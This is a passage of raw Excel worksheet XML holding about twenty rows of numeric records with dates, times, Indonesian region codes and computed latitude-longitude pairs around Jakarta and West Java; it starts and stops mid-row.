        <v>3174070004</v>
      </c>
      <c r="N359">
        <v>3174070</v>
      </c>
      <c r="O359">
        <v>3174</v>
      </c>
      <c r="P359">
        <v>31</v>
      </c>
      <c r="Q359" t="s">
        <v>926</v>
      </c>
      <c r="R359" t="s">
        <v>84</v>
      </c>
      <c r="S359" t="s">
        <v>32</v>
      </c>
      <c r="T359" t="s">
        <v>33</v>
      </c>
      <c r="U359" s="5">
        <v>10673927</v>
      </c>
      <c r="V359" s="5" t="s">
        <v>14783</v>
      </c>
      <c r="W359" s="5">
        <v>-614747</v>
      </c>
      <c r="X359" t="s">
        <v>18593</v>
      </c>
      <c r="Y359" t="str">
        <f t="shared" si="5"/>
        <v>-6.14747,106.73927</v>
      </c>
    </row>
    <row r="360" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A360">
        <v>101986</v>
      </c>
      <c r="B360" s="1">
        <v>43854</v>
      </c>
      <c r="C360" s="2">
        <v>0.20958333333333334</v>
      </c>
      <c r="D360" t="s">
        <v>22</v>
      </c>
      <c r="E360" t="s">
        <v>23</v>
      </c>
      <c r="F360" t="s">
        <v>1678</v>
      </c>
      <c r="G360" t="s">
        <v>1679</v>
      </c>
      <c r="H360" t="s">
        <v>26</v>
      </c>
      <c r="I360" t="s">
        <v>1633</v>
      </c>
      <c r="J360" t="s">
        <v>1680</v>
      </c>
      <c r="L360" t="s">
        <v>1681</v>
      </c>
      <c r="M360">
        <v>3175050001</v>
      </c>
      <c r="N360">
        <v>3175050</v>
      </c>
      <c r="O360">
        <v>3175</v>
      </c>
      <c r="P360">
        <v>31</v>
      </c>
      <c r="Q360" t="s">
        <v>1037</v>
      </c>
      <c r="R360" t="s">
        <v>1013</v>
      </c>
      <c r="S360" t="s">
        <v>547</v>
      </c>
      <c r="T360" t="s">
        <v>33</v>
      </c>
      <c r="U360" s="5">
        <v>10690159</v>
      </c>
      <c r="V360" s="5" t="s">
        <v>14784</v>
      </c>
      <c r="W360" s="5">
        <v>-615808</v>
      </c>
      <c r="X360" t="s">
        <v>18594</v>
      </c>
      <c r="Y360" t="str">
        <f t="shared" si="5"/>
        <v>-6.15808,106.90159</v>
      </c>
    </row>
    <row r="361" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A361">
        <v>101988</v>
      </c>
      <c r="B361" s="1">
        <v>43854</v>
      </c>
      <c r="C361" s="2">
        <v>0.21375</v>
      </c>
      <c r="D361" t="s">
        <v>22</v>
      </c>
      <c r="E361" t="s">
        <v>23</v>
      </c>
      <c r="F361" t="s">
        <v>1682</v>
      </c>
      <c r="H361" t="s">
        <v>26</v>
      </c>
      <c r="I361" t="s">
        <v>1683</v>
      </c>
      <c r="J361" t="s">
        <v>1684</v>
      </c>
      <c r="L361" t="s">
        <v>1685</v>
      </c>
      <c r="M361">
        <v>3175010005</v>
      </c>
      <c r="N361">
        <v>3175010</v>
      </c>
      <c r="O361">
        <v>3175</v>
      </c>
      <c r="P361">
        <v>31</v>
      </c>
      <c r="Q361" t="s">
        <v>1686</v>
      </c>
      <c r="R361" t="s">
        <v>546</v>
      </c>
      <c r="S361" t="s">
        <v>547</v>
      </c>
      <c r="T361" t="s">
        <v>33</v>
      </c>
      <c r="U361" s="5">
        <v>10678684</v>
      </c>
      <c r="V361" s="5" t="s">
        <v>14785</v>
      </c>
      <c r="W361" s="5">
        <v>-612338</v>
      </c>
      <c r="X361" t="s">
        <v>18595</v>
      </c>
      <c r="Y361" t="str">
        <f t="shared" si="5"/>
        <v>-6.12338,106.78684</v>
      </c>
    </row>
    <row r="362" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A362">
        <v>101989</v>
      </c>
      <c r="B362" s="1">
        <v>43854</v>
      </c>
      <c r="C362" s="2">
        <v>0.21486111111111109</v>
      </c>
      <c r="D362" t="s">
        <v>22</v>
      </c>
      <c r="E362" t="s">
        <v>23</v>
      </c>
      <c r="F362" t="s">
        <v>1687</v>
      </c>
      <c r="G362" t="s">
        <v>1688</v>
      </c>
      <c r="H362" t="s">
        <v>26</v>
      </c>
      <c r="I362" t="s">
        <v>1689</v>
      </c>
      <c r="J362" t="s">
        <v>1690</v>
      </c>
      <c r="L362" t="s">
        <v>1691</v>
      </c>
      <c r="M362">
        <v>3175010004</v>
      </c>
      <c r="N362">
        <v>3175010</v>
      </c>
      <c r="O362">
        <v>3175</v>
      </c>
      <c r="P362">
        <v>31</v>
      </c>
      <c r="Q362" t="s">
        <v>546</v>
      </c>
      <c r="R362" t="s">
        <v>546</v>
      </c>
      <c r="S362" t="s">
        <v>547</v>
      </c>
      <c r="T362" t="s">
        <v>33</v>
      </c>
      <c r="U362" s="5">
        <v>10680445</v>
      </c>
      <c r="V362" s="5" t="s">
        <v>14786</v>
      </c>
      <c r="W362" s="5">
        <v>-612341</v>
      </c>
      <c r="X362" t="s">
        <v>18596</v>
      </c>
      <c r="Y362" t="str">
        <f t="shared" si="5"/>
        <v>-6.12341,106.80445</v>
      </c>
    </row>
    <row r="363" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A363">
        <v>101990</v>
      </c>
      <c r="B363" s="1">
        <v>43854</v>
      </c>
      <c r="C363" s="2">
        <v>0.21483796296296298</v>
      </c>
      <c r="D363" t="s">
        <v>22</v>
      </c>
      <c r="E363" t="s">
        <v>23</v>
      </c>
      <c r="F363" t="s">
        <v>1692</v>
      </c>
      <c r="G363" t="s">
        <v>1693</v>
      </c>
      <c r="H363" t="s">
        <v>26</v>
      </c>
      <c r="I363" t="s">
        <v>166</v>
      </c>
      <c r="J363" t="s">
        <v>1694</v>
      </c>
      <c r="L363" t="s">
        <v>1695</v>
      </c>
      <c r="M363">
        <v>3174080004</v>
      </c>
      <c r="N363">
        <v>3174080</v>
      </c>
      <c r="O363">
        <v>3174</v>
      </c>
      <c r="P363">
        <v>31</v>
      </c>
      <c r="Q363" t="s">
        <v>1696</v>
      </c>
      <c r="R363" t="s">
        <v>695</v>
      </c>
      <c r="S363" t="s">
        <v>32</v>
      </c>
      <c r="T363" t="s">
        <v>33</v>
      </c>
      <c r="U363" s="5">
        <v>10671239</v>
      </c>
      <c r="V363" s="5" t="s">
        <v>14787</v>
      </c>
      <c r="W363" s="5">
        <v>-611010</v>
      </c>
      <c r="X363" t="s">
        <v>18597</v>
      </c>
      <c r="Y363" t="str">
        <f t="shared" si="5"/>
        <v>-6.11010,106.71239</v>
      </c>
    </row>
    <row r="364" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A364">
        <v>101991</v>
      </c>
      <c r="B364" s="1">
        <v>43854</v>
      </c>
      <c r="C364" s="2">
        <v>0.21884259259259262</v>
      </c>
      <c r="D364" t="s">
        <v>22</v>
      </c>
      <c r="E364" t="s">
        <v>23</v>
      </c>
      <c r="F364" t="s">
        <v>1697</v>
      </c>
      <c r="H364" t="s">
        <v>26</v>
      </c>
      <c r="I364" t="s">
        <v>1633</v>
      </c>
      <c r="J364" t="s">
        <v>1698</v>
      </c>
      <c r="L364" t="s">
        <v>1699</v>
      </c>
      <c r="M364">
        <v>3174080003</v>
      </c>
      <c r="N364">
        <v>3174080</v>
      </c>
      <c r="O364">
        <v>3174</v>
      </c>
      <c r="P364">
        <v>31</v>
      </c>
      <c r="Q364" t="s">
        <v>1700</v>
      </c>
      <c r="R364" t="s">
        <v>695</v>
      </c>
      <c r="S364" t="s">
        <v>32</v>
      </c>
      <c r="T364" t="s">
        <v>33</v>
      </c>
      <c r="U364" s="5">
        <v>10670858</v>
      </c>
      <c r="V364" s="5" t="s">
        <v>14788</v>
      </c>
      <c r="W364" s="5">
        <v>-613455</v>
      </c>
      <c r="X364" t="s">
        <v>18598</v>
      </c>
      <c r="Y364" t="str">
        <f t="shared" si="5"/>
        <v>-6.13455,106.70858</v>
      </c>
    </row>
    <row r="365" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A365">
        <v>101992</v>
      </c>
      <c r="B365" s="1">
        <v>43854</v>
      </c>
      <c r="C365" s="2">
        <v>0.22376157407407407</v>
      </c>
      <c r="D365" t="s">
        <v>22</v>
      </c>
      <c r="E365" t="s">
        <v>23</v>
      </c>
      <c r="F365" t="s">
        <v>1701</v>
      </c>
      <c r="G365" t="s">
        <v>1702</v>
      </c>
      <c r="H365" t="s">
        <v>26</v>
      </c>
      <c r="I365" t="s">
        <v>1161</v>
      </c>
      <c r="J365" t="s">
        <v>1703</v>
      </c>
      <c r="L365" t="s">
        <v>1704</v>
      </c>
      <c r="M365">
        <v>3172060002</v>
      </c>
      <c r="N365">
        <v>3172060</v>
      </c>
      <c r="O365">
        <v>3172</v>
      </c>
      <c r="P365">
        <v>31</v>
      </c>
      <c r="Q365" t="s">
        <v>1025</v>
      </c>
      <c r="R365" t="s">
        <v>48</v>
      </c>
      <c r="S365" t="s">
        <v>49</v>
      </c>
      <c r="T365" t="s">
        <v>33</v>
      </c>
      <c r="U365" s="5">
        <v>10687796</v>
      </c>
      <c r="V365" s="5" t="s">
        <v>14789</v>
      </c>
      <c r="W365" s="5">
        <v>-623889</v>
      </c>
      <c r="X365" t="s">
        <v>18599</v>
      </c>
      <c r="Y365" t="str">
        <f t="shared" si="5"/>
        <v>-6.23889,106.87796</v>
      </c>
    </row>
    <row r="366" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A366">
        <v>101993</v>
      </c>
      <c r="B366" s="1">
        <v>43854</v>
      </c>
      <c r="C366" s="2">
        <v>0.22414351851851852</v>
      </c>
      <c r="D366" t="s">
        <v>22</v>
      </c>
      <c r="E366" t="s">
        <v>23</v>
      </c>
      <c r="F366" t="s">
        <v>1705</v>
      </c>
      <c r="G366" t="s">
        <v>1706</v>
      </c>
      <c r="H366" t="s">
        <v>26</v>
      </c>
      <c r="I366" t="s">
        <v>1621</v>
      </c>
      <c r="J366" t="s">
        <v>586</v>
      </c>
      <c r="L366" t="s">
        <v>1707</v>
      </c>
      <c r="M366">
        <v>3173050002</v>
      </c>
      <c r="N366">
        <v>3173050</v>
      </c>
      <c r="O366">
        <v>3173</v>
      </c>
      <c r="P366">
        <v>31</v>
      </c>
      <c r="Q366" t="s">
        <v>588</v>
      </c>
      <c r="R366" t="s">
        <v>589</v>
      </c>
      <c r="S366" t="s">
        <v>62</v>
      </c>
      <c r="T366" t="s">
        <v>33</v>
      </c>
      <c r="U366" s="5">
        <v>10686535</v>
      </c>
      <c r="V366" s="5" t="s">
        <v>14790</v>
      </c>
      <c r="W366" s="5">
        <v>-617502</v>
      </c>
      <c r="X366" t="s">
        <v>18600</v>
      </c>
      <c r="Y366" t="str">
        <f t="shared" si="5"/>
        <v>-6.17502,106.86535</v>
      </c>
    </row>
    <row r="367" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A367">
        <v>101994</v>
      </c>
      <c r="B367" s="1">
        <v>43854</v>
      </c>
      <c r="C367" s="2">
        <v>0.2240972222222222</v>
      </c>
      <c r="D367" t="s">
        <v>22</v>
      </c>
      <c r="E367" t="s">
        <v>23</v>
      </c>
      <c r="F367" t="s">
        <v>1708</v>
      </c>
      <c r="G367" t="s">
        <v>1709</v>
      </c>
      <c r="H367" t="s">
        <v>26</v>
      </c>
      <c r="I367" t="s">
        <v>1710</v>
      </c>
      <c r="J367" t="s">
        <v>1711</v>
      </c>
      <c r="L367" t="s">
        <v>1712</v>
      </c>
      <c r="M367">
        <v>3175050001</v>
      </c>
      <c r="N367">
        <v>3175050</v>
      </c>
      <c r="O367">
        <v>3175</v>
      </c>
      <c r="P367">
        <v>31</v>
      </c>
      <c r="Q367" t="s">
        <v>1037</v>
      </c>
      <c r="R367" t="s">
        <v>1013</v>
      </c>
      <c r="S367" t="s">
        <v>547</v>
      </c>
      <c r="T367" t="s">
        <v>33</v>
      </c>
      <c r="U367" s="5">
        <v>10690598</v>
      </c>
      <c r="V367" s="5" t="s">
        <v>14791</v>
      </c>
      <c r="W367" s="5">
        <v>-614591</v>
      </c>
      <c r="X367" t="s">
        <v>18601</v>
      </c>
      <c r="Y367" t="str">
        <f t="shared" si="5"/>
        <v>-6.14591,106.90598</v>
      </c>
    </row>
    <row r="368" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A368">
        <v>101995</v>
      </c>
      <c r="B368" s="1">
        <v>43854</v>
      </c>
      <c r="C368" s="2">
        <v>0.22497685185185187</v>
      </c>
      <c r="D368" t="s">
        <v>22</v>
      </c>
      <c r="E368" t="s">
        <v>23</v>
      </c>
      <c r="F368" t="s">
        <v>1713</v>
      </c>
      <c r="G368" t="s">
        <v>1714</v>
      </c>
      <c r="H368" t="s">
        <v>26</v>
      </c>
      <c r="I368" t="s">
        <v>76</v>
      </c>
      <c r="J368" t="s">
        <v>1715</v>
      </c>
      <c r="L368" t="s">
        <v>1716</v>
      </c>
      <c r="M368">
        <v>3175010005</v>
      </c>
      <c r="N368">
        <v>3175010</v>
      </c>
      <c r="O368">
        <v>3175</v>
      </c>
      <c r="P368">
        <v>31</v>
      </c>
      <c r="Q368" t="s">
        <v>1686</v>
      </c>
      <c r="R368" t="s">
        <v>546</v>
      </c>
      <c r="S368" t="s">
        <v>547</v>
      </c>
      <c r="T368" t="s">
        <v>33</v>
      </c>
      <c r="U368" s="5">
        <v>10676936</v>
      </c>
      <c r="V368" s="5" t="s">
        <v>14792</v>
      </c>
      <c r="W368" s="5">
        <v>-610755</v>
      </c>
      <c r="X368" t="s">
        <v>18602</v>
      </c>
      <c r="Y368" t="str">
        <f t="shared" si="5"/>
        <v>-6.10755,106.76936</v>
      </c>
    </row>
    <row r="369" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A369">
        <v>101996</v>
      </c>
      <c r="B369" s="1">
        <v>43854</v>
      </c>
      <c r="C369" s="2">
        <v>0.23199074074074075</v>
      </c>
      <c r="D369" t="s">
        <v>22</v>
      </c>
      <c r="E369" t="s">
        <v>23</v>
      </c>
      <c r="F369" t="s">
        <v>1717</v>
      </c>
      <c r="G369" t="s">
        <v>1718</v>
      </c>
      <c r="H369" t="s">
        <v>26</v>
      </c>
      <c r="I369" t="s">
        <v>974</v>
      </c>
      <c r="J369" t="s">
        <v>1719</v>
      </c>
      <c r="L369" t="s">
        <v>1720</v>
      </c>
      <c r="M369">
        <v>3172060002</v>
      </c>
      <c r="N369">
        <v>3172060</v>
      </c>
      <c r="O369">
        <v>3172</v>
      </c>
      <c r="P369">
        <v>31</v>
      </c>
      <c r="Q369" t="s">
        <v>1025</v>
      </c>
      <c r="R369" t="s">
        <v>48</v>
      </c>
      <c r="S369" t="s">
        <v>49</v>
      </c>
      <c r="T369" t="s">
        <v>33</v>
      </c>
      <c r="U369" s="5">
        <v>10687632</v>
      </c>
      <c r="V369" s="5" t="s">
        <v>14793</v>
      </c>
      <c r="W369" s="5">
        <v>-623181</v>
      </c>
      <c r="X369" t="s">
        <v>18603</v>
      </c>
      <c r="Y369" t="str">
        <f t="shared" si="5"/>
        <v>-6.23181,106.87632</v>
      </c>
    </row>
    <row r="370" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A370">
        <v>101997</v>
      </c>
      <c r="B370" s="1">
        <v>43854</v>
      </c>
      <c r="C370" s="2">
        <v>0.23840277777777777</v>
      </c>
      <c r="D370" t="s">
        <v>22</v>
      </c>
      <c r="E370" t="s">
        <v>23</v>
      </c>
      <c r="F370" t="s">
        <v>1721</v>
      </c>
      <c r="G370" t="s">
        <v>1722</v>
      </c>
      <c r="H370" t="s">
        <v>26</v>
      </c>
      <c r="I370" t="s">
        <v>166</v>
      </c>
      <c r="J370" t="s">
        <v>1703</v>
      </c>
      <c r="L370" t="s">
        <v>1723</v>
      </c>
      <c r="M370">
        <v>3172060002</v>
      </c>
      <c r="N370">
        <v>3172060</v>
      </c>
      <c r="O370">
        <v>3172</v>
      </c>
      <c r="P370">
        <v>31</v>
      </c>
      <c r="Q370" t="s">
        <v>1025</v>
      </c>
      <c r="R370" t="s">
        <v>48</v>
      </c>
      <c r="S370" t="s">
        <v>49</v>
      </c>
      <c r="T370" t="s">
        <v>33</v>
      </c>
      <c r="U370" s="5">
        <v>10687792</v>
      </c>
      <c r="V370" s="5" t="s">
        <v>14794</v>
      </c>
      <c r="W370" s="5">
        <v>-623857</v>
      </c>
      <c r="X370" t="s">
        <v>18604</v>
      </c>
      <c r="Y370" t="str">
        <f t="shared" si="5"/>
        <v>-6.23857,106.87792</v>
      </c>
    </row>
    <row r="371" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A371">
        <v>101998</v>
      </c>
      <c r="B371" s="1">
        <v>43854</v>
      </c>
      <c r="C371" s="2">
        <v>0.23923611111111112</v>
      </c>
      <c r="D371" t="s">
        <v>22</v>
      </c>
      <c r="E371" t="s">
        <v>23</v>
      </c>
      <c r="F371" t="s">
        <v>1724</v>
      </c>
      <c r="G371" t="s">
        <v>1725</v>
      </c>
      <c r="H371" t="s">
        <v>26</v>
      </c>
      <c r="I371" t="s">
        <v>867</v>
      </c>
      <c r="J371" t="s">
        <v>37</v>
      </c>
      <c r="M371">
        <v>3603210004</v>
      </c>
      <c r="N371">
        <v>3603210</v>
      </c>
      <c r="O371">
        <v>3603</v>
      </c>
      <c r="P371">
        <v>36</v>
      </c>
      <c r="Q371" t="s">
        <v>1726</v>
      </c>
      <c r="R371" t="s">
        <v>1727</v>
      </c>
      <c r="S371" t="s">
        <v>201</v>
      </c>
      <c r="T371" t="s">
        <v>171</v>
      </c>
      <c r="U371" s="5">
        <v>10668422</v>
      </c>
      <c r="V371" s="5" t="s">
        <v>14795</v>
      </c>
      <c r="W371" s="5">
        <v>-608947</v>
      </c>
      <c r="X371" t="s">
        <v>18605</v>
      </c>
      <c r="Y371" t="str">
        <f t="shared" si="5"/>
        <v>-6.08947,106.68422</v>
      </c>
    </row>
    <row r="372" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A372">
        <v>101999</v>
      </c>
      <c r="B372" s="1">
        <v>43854</v>
      </c>
      <c r="C372" s="2">
        <v>0.24886574074074075</v>
      </c>
      <c r="D372" t="s">
        <v>22</v>
      </c>
      <c r="E372" t="s">
        <v>23</v>
      </c>
      <c r="F372" t="s">
        <v>1728</v>
      </c>
      <c r="H372" t="s">
        <v>26</v>
      </c>
      <c r="I372" t="s">
        <v>1729</v>
      </c>
      <c r="J372" t="s">
        <v>1460</v>
      </c>
      <c r="L372" t="s">
        <v>1730</v>
      </c>
      <c r="M372">
        <v>3204140004</v>
      </c>
      <c r="N372">
        <v>3204140</v>
      </c>
      <c r="O372">
        <v>3204</v>
      </c>
      <c r="P372">
        <v>32</v>
      </c>
      <c r="Q372" t="s">
        <v>1731</v>
      </c>
      <c r="R372" t="s">
        <v>1732</v>
      </c>
      <c r="S372" t="s">
        <v>1464</v>
      </c>
      <c r="T372" t="s">
        <v>42</v>
      </c>
      <c r="U372" s="5">
        <v>10762560</v>
      </c>
      <c r="V372" s="5" t="s">
        <v>14796</v>
      </c>
      <c r="W372" s="5">
        <v>-699115</v>
      </c>
      <c r="X372" t="s">
        <v>18606</v>
      </c>
      <c r="Y372" t="str">
        <f t="shared" si="5"/>
        <v>-6.99115,107.62560</v>
      </c>
    </row>
    <row r="373" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A373">
        <v>102000</v>
      </c>
      <c r="B373" s="1">
        <v>43854</v>
      </c>
      <c r="C373" s="2">
        <v>0.25208333333333333</v>
      </c>
      <c r="D373" t="s">
        <v>22</v>
      </c>
      <c r="E373" t="s">
        <v>23</v>
      </c>
      <c r="F373" t="s">
        <v>1733</v>
      </c>
      <c r="G373" t="s">
        <v>1734</v>
      </c>
      <c r="H373" t="s">
        <v>26</v>
      </c>
      <c r="I373" t="s">
        <v>1735</v>
      </c>
      <c r="J373" t="s">
        <v>1703</v>
      </c>
      <c r="L373" t="s">
        <v>1736</v>
      </c>
      <c r="M373">
        <v>3172060002</v>
      </c>
      <c r="N373">
        <v>3172060</v>
      </c>
      <c r="O373">
        <v>3172</v>
      </c>
      <c r="P373">
        <v>31</v>
      </c>
      <c r="Q373" t="s">
        <v>1025</v>
      </c>
      <c r="R373" t="s">
        <v>48</v>
      </c>
      <c r="S373" t="s">
        <v>49</v>
      </c>
      <c r="T373" t="s">
        <v>33</v>
      </c>
      <c r="U373" s="5">
        <v>10687788</v>
      </c>
      <c r="V373" s="5" t="s">
        <v>14797</v>
      </c>
      <c r="W373" s="5">
        <v>-623916</v>
      </c>
      <c r="X373" t="s">
        <v>18607</v>
      </c>
      <c r="Y373" t="str">
        <f t="shared" si="5"/>
        <v>-6.23916,106.87788</v>
      </c>
    </row>
    <row r="374" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A374">
        <v>102001</v>
      </c>
      <c r="B374" s="1">
        <v>43854</v>
      </c>
      <c r="C374" s="2">
        <v>0.2578125</v>
      </c>
      <c r="D374" t="s">
        <v>22</v>
      </c>
      <c r="E374" t="s">
        <v>23</v>
      </c>
      <c r="F374" t="s">
        <v>1737</v>
      </c>
      <c r="G374" t="s">
        <v>1738</v>
      </c>
      <c r="H374" t="s">
        <v>26</v>
      </c>
      <c r="I374" t="s">
        <v>882</v>
      </c>
      <c r="J374" t="s">
        <v>1739</v>
      </c>
      <c r="M374">
        <v>3175050003</v>
      </c>
      <c r="N374">
        <v>3175050</v>
      </c>
      <c r="O374">
        <v>3175</v>
      </c>
      <c r="P374">
        <v>31</v>
      </c>
      <c r="Q374" t="s">
        <v>1740</v>
      </c>
      <c r="R374" t="s">
        <v>1013</v>
      </c>
      <c r="S374" t="s">
        <v>547</v>
      </c>
      <c r="T374" t="s">
        <v>33</v>
      </c>
      <c r="U374" s="5">
        <v>10691129</v>
      </c>
      <c r="V374" s="5" t="s">
        <v>14798</v>
      </c>
      <c r="W374" s="5">
        <v>-614846</v>
      </c>
      <c r="X374" t="s">
        <v>18608</v>
      </c>
      <c r="Y374" t="str">
        <f t="shared" si="5"/>
        <v>-6.14846,106.91129</v>
      </c>
    </row>
    <row r="375" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A375">
        <v>102002</v>
      </c>
      <c r="B375" s="1">
        <v>43854</v>
      </c>
      <c r="C375" s="2">
        <v>0.2625925925925926</v>
      </c>
      <c r="D375" t="s">
        <v>22</v>
      </c>
      <c r="E375" t="s">
        <v>23</v>
      </c>
      <c r="F375" t="s">
        <v>1741</v>
      </c>
      <c r="G375" t="s">
        <v>1742</v>
      </c>
      <c r="H375" t="s">
        <v>26</v>
      </c>
      <c r="I375" t="s">
        <v>979</v>
      </c>
      <c r="J375" t="s">
        <v>37</v>
      </c>
      <c r="L375" t="s">
        <v>1743</v>
      </c>
      <c r="M375">
        <v>3603210004</v>
      </c>
      <c r="N375">
        <v>3603210</v>
      </c>
      <c r="O375">
        <v>3603</v>
      </c>
      <c r="P375">
        <v>36</v>
      </c>
      <c r="Q375" t="s">
        <v>1726</v>
      </c>
      <c r="R375" t="s">
        <v>1727</v>
      </c>
      <c r="S375" t="s">
        <v>201</v>
      </c>
      <c r="T375" t="s">
        <v>171</v>
      </c>
      <c r="U375" s="5">
        <v>10668952</v>
      </c>
      <c r="V375" s="5" t="s">
        <v>14799</v>
      </c>
      <c r="W375" s="5">
        <v>-609605</v>
      </c>
      <c r="X375" t="s">
        <v>18609</v>
      </c>
      <c r="Y375" t="str">
        <f t="shared" si="5"/>
        <v>-6.09605,106.68952</v>
      </c>
    </row>
    <row r="376" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A376">
        <v>102003</v>
      </c>
      <c r="B376" s="1">
        <v>43854</v>
      </c>
      <c r="C376" s="2">
        <v>0.26601851851851849</v>
      </c>
      <c r="D376" t="s">
        <v>22</v>
      </c>
      <c r="E376" t="s">
        <v>23</v>
      </c>
      <c r="F376" t="s">
        <v>1744</v>
      </c>
      <c r="H376" t="s">
        <v>26</v>
      </c>
      <c r="I376" t="s">
        <v>523</v>
      </c>
      <c r="J376" t="s">
        <v>1745</v>
      </c>
      <c r="L376" t="s">
        <v>1746</v>
      </c>
      <c r="M376">
        <v>3175050003</v>
      </c>
      <c r="N376">
        <v>3175050</v>
      </c>
      <c r="O376">
        <v>3175</v>
      </c>
      <c r="P376">
        <v>31</v>
      </c>
      <c r="Q376" t="s">
        <v>1740</v>
      </c>
      <c r="R376" t="s">
        <v>1013</v>
      </c>
      <c r="S376" t="s">
        <v>547</v>
      </c>
      <c r="T376" t="s">
        <v>33</v>
      </c>
      <c r="U376" s="5">
        <v>10691096</v>
      </c>
      <c r="V376" s="5" t="s">
        <v>14800</v>
      </c>
      <c r="W376" s="5">
        <v>-616385</v>
      </c>
      <c r="X376" t="s">
        <v>18467</v>
      </c>
      <c r="Y376" t="str">
        <f t="shared" si="5"/>
        <v>-6.16385,106.91096</v>
      </c>
    </row>
    <row r="377" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A377">
        <v>102004</v>
      </c>
      <c r="B377" s="1">
        <v>43854</v>
      </c>
      <c r="C377" s="2">
        <v>0.28207175925925926</v>
      </c>
      <c r="D377" t="s">
        <v>22</v>
      </c>
      <c r="E377" t="s">
        <v>23</v>
      </c>
      <c r="F377" t="s">
        <v>1747</v>
      </c>
      <c r="G377" t="s">
        <v>1748</v>
      </c>
      <c r="H377" t="s">
        <v>26</v>
      </c>
      <c r="I377" t="s">
        <v>181</v>
      </c>
      <c r="J377" t="s">
        <v>1749</v>
      </c>
      <c r="M377">
        <v>3174080004</v>
      </c>
      <c r="N377">
        <v>3174080</v>
      </c>
      <c r="O377">
        <v>3174</v>
      </c>
      <c r="P377">
        <v>31</v>
      </c>
      <c r="Q377" t="s">
        <v>1696</v>
      </c>
      <c r="R377" t="s">
        <v>695</v>
      </c>
      <c r="S377" t="s">
        <v>32</v>
      </c>
      <c r="T377" t="s">
        <v>33</v>
      </c>
      <c r="U377" s="5">
        <v>10671121</v>
      </c>
      <c r="V377" s="5" t="s">
        <v>14801</v>
      </c>
      <c r="W377" s="5">
        <v>-611852</v>
      </c>
      <c r="X377" t="s">
        <v>18610</v>
      </c>
      <c r="Y377" t="str">
        <f t="shared" si="5"/>
        <v>-6.11852,106.71121</v>
      </c>
    </row>
    <row r="378" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A378">
        <v>102006</v>
      </c>
      <c r="B378" s="1">
        <v>43854</v>
      </c>
      <c r="C378" s="2">
        <v>0.28715277777777776</v>
      </c>
      <c r="D378" t="s">
        <v>22</v>
      </c>
      <c r="E378" t="s">
        <v>23</v>
      </c>
      <c r="F378" t="s">
        <v>1750</v>
      </c>
      <c r="G378" t="s">
        <v>1751</v>
      </c>
      <c r="H378" t="s">
        <v>26</v>
      </c>
      <c r="I378" t="s">
        <v>517</v>
      </c>
      <c r="J378" t="s">
        <v>1752</v>
      </c>
      <c r="M378">
        <v>3175050001</v>
      </c>
      <c r="N378">
        <v>3175050</v>
      </c>
      <c r="O378">
        <v>3175</v>
      </c>
      <c r="P378">
        <v>31</v>
      </c>
      <c r="Q378" t="s">
        <v>1037</v>
      </c>
      <c r="R378" t="s">
        <v>1013</v>
      </c>
      <c r="S378" t="s">
        <v>547</v>
      </c>
      <c r="T378" t="s">
        <v>33</v>
      </c>
      <c r="U378" s="5">
        <v>10689728</v>
      </c>
      <c r="V378" s="5" t="s">
        <v>14802</v>
      </c>
      <c r="W378" s="5">
        <v>-615279</v>
      </c>
      <c r="X378" t="s">
        <v>18611</v>
      </c>
      <c r="Y378" t="str">
        <f t="shared" si="5"/>
        <v>-6.15279,106.89728</v>
      </c>
    </row>
    <row r="379" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A379">
        <v>102007</v>
      </c>
      <c r="B379" s="1">
        <v>43854</v>
      </c>
      <c r="C379" s="2">
        <v>0.28815972222222225</v>
      </c>
      <c r="D379" t="s">
        <v>22</v>
      </c>
      <c r="E379" t="s">
        <v>23</v>
      </c>
      <c r="F379" t="s">
        <v>1753</v>
      </c>
      <c r="H379" t="s">
        <v>26</v>
      </c>
      <c r="I379" t="s">
        <v>784</v>
      </c>
      <c r="J379" t="s">
        <v>586</v>
      </c>
      <c r="L379" t="s">
        <v>1754</v>
      </c>
      <c r="M379">
        <v>3173050002</v>
      </c>
      <c r="N379">
        <v>3173050</v>
      </c>
      <c r="O379">
        <v>3173</v>
      </c>
      <c r="P379">
        <v>31</v>
      </c>
      <c r="Q379" t="s">
        <v>588</v>
      </c>
      <c r="R379" t="s">
        <v>589</v>
      </c>
      <c r="S379" t="s">
        <v>62</v>
      </c>
      <c r="T379" t="s">
        <v>33</v>
      </c>
      <c r="U379" s="5">
        <v>10686539</v>
      </c>
      <c r="V379" s="5" t="s">
        <v>14555</v>
      </c>
      <c r="W379" s="5">
        <v>-617469</v>
      </c>
      <c r="X379" t="s">
        <v>18368</v>
      </c>
      <c r="Y379" t="str">
        <f t="shared" si="5"/>
        <v>-6.17469,106.86539</v>
      </c>
    </row>
    <row r="380" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A380">
        <v>102008</v>
      </c>
      <c r="B380" s="1">
        <v>43854</v>
      </c>
      <c r="C380" s="2">
        <v>0.28876157407407405</v>
      </c>
      <c r="D380" t="s">
        <v>22</v>
      </c>
      <c r="E380" t="s">
        <v>23</v>
      </c>
      <c r="F380" t="s">
        <v>1755</v>
      </c>
      <c r="H380" t="s">
        <v>26</v>
      </c>
      <c r="I380" t="s">
        <v>784</v>
      </c>
      <c r="J380" t="s">
        <v>586</v>
      </c>
      <c r="L380" t="s">
        <v>1756</v>
      </c>
      <c r="M380">
        <v>3173050002</v>
      </c>
      <c r="N380">
        <v>3173050</v>
      </c>
      <c r="O380">
        <v>3173</v>
      </c>
      <c r="P380">
        <v>31</v>
      </c>
      <c r="Q380" t="s">
        <v>588</v>
      </c>
      <c r="R380" t="s">
        <v>589</v>
      </c>
      <c r="S380" t="s">
        <v>62</v>
      </c>
